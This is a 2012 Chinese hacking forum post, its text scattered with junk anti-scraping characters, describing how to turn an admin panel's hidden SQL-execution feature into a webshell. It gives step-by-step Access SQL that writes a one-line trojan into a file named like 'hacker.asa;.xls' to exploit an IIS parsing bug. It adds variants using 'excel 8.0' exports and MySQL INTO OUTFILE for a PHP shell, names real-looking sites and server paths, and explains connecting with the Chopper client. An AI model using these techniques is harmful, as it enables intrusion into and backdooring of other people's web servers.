好不容易进了后台,发现啥上传啊。备份啊多木有。
" }, p2 T9 w8 g/ N' Jwebshell一直拿不到。后来翻了一下源码。有一个执行SQL命令的% L1 a5 ~+ j7 K) v, l
文件。可后台没显示这功能。直接填上文件名字,执行命令的选项出来了,
- q) k. S# M3 t5 Q然后就试用了下面的命令导出一句话木马。没想到成功了。命令方法如下:
1 ?5 U! E% f+ G$ f. ^8 ^1.create table cmd (a varchar(50))2 I) `& t# F% s8 h
2.insert into cmd (a) values (‘‘); H. R( F( y1 o t% k
3.select * into [a] in ‘D:\wwwroot\www.koohik.com\hacker.asa;.xls’ ‘excel 4.0;’ from cmd# p% x- z [3 Q
(把表cmd的内容导出为物理路径的一个EXCEL文件)+ ]+ ] z& A4 Y, d7 f0 T, ]
4.drop table cmd
) I0 s' k" z. I) R7 B; l利用IIS的BUG成功拿到了WEBSHELL。
$ }5 K- Q/ {# X5 _
) y8 B5 h* V( V8 |直接菜刀里连接http://www.chouwazi.com/data/xiao.asp;xiao.xls一句话2 B) l9 {; f Z1 x
: ?+ {4 ~9 m( o5 i* z SQL语句意思解释:) Q7 S, b9 V3 v& t8 m( q1 F2 @
第一句' [5 l0 _, e! z& S5 ]. K
建立一个有一个A字段的表 表名为cmd 字段类型为字符 长度为502 m! |. [( \1 f0 O ?' G, V
- {9 M! [9 h4 Z; w; g3 t, e 第二句
, J) t6 x4 [8 I) P @3 Z1 P 在表cmd的a字段插入一句话木马9 D& Y' x! I5 ~1 r) j' o4 H
第三句
" j; C' |2 P6 ?9 y0 {( i- N _ 把cmd表a的内容导出到路径e:\host\chouwazi.com\web\data\的EXCEL文件
" U7 u3 J% ^' r6 P
q8 _) y3 u6 Y, K" T& R: M$ g+ l 第四句. X! z1 L6 F7 i& q& [' |
删除建立的cmd表
7 R! v* l7 B4 X2 X# e; C V" b. F! m1 N% g& x. _! I2 [
以下内容为测试:
7 z: q8 k+ d7 L$ z: Z1 l! z! s Access利用后台SQL执行命令功能导出WebShell:
( T. \" a0 [! w4 T( C0 ]/ _9 d$ |* D 这个更简单:$ _2 b+ q/ ~2 k
[ol][li]Select 'asp一句话木马' into [vote] in 'd:/chouwazi.com/x.asp;.xls' 'excel 8.0;' from vote [/li][/ol]
, K6 t$ A% D& d( @2 [7 l8 j! E2 D6 y 或者0 z1 e0 X/ s1 U% x5 x" D
[ol][li]Select 'php一句话木马' into outfile 'F:/wwwroot/chouwazi.com/eval.php'; [/li][/ol]
) Y3 N. D; ^- A/ t" m$ s5 x( P. b
后台有执行SQL语句功能(vote为已知表段)
2 c1 f/ r0 X8 n! G+ V7 f 希望对大家有所帮助拿shell的又一个思路
$ M; D; C9 h% F0 o1 g; U$ g |
发表于 2012-9-13 17:53:58
收藏
支持
反对